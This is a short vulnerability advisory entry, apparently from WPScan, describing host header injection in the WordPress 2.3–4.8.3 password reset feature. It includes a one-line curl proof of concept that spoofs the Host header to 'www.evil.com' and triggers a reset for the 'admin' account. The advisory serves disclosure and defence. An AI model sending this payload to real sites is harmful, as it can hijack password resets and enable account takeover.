Lucene search

K
wpvulndbEthicalhack3rWPVDB-ID:B3F2F3DB-75E4-4D48-AE5E-D4FF172BC093
HistoryMay 03, 2017 - 12:00 a.m.

WordPress 2.3-4.8.3 - Host Header Injection in Password Reset

2017-05-0300:00:00
ethicalhack3r
wpscan.com
22

EPSS

0.026

Percentile

90.4%

Attacker may be able to set the ‘From’ email header in password reset emails.

PoC

curl -H “Host: www.evil.com” --data “user_login=admin&redirect;_to=&wp-submit;=Get+New+Password” http://example.com/wp-login.php?action=lostpassword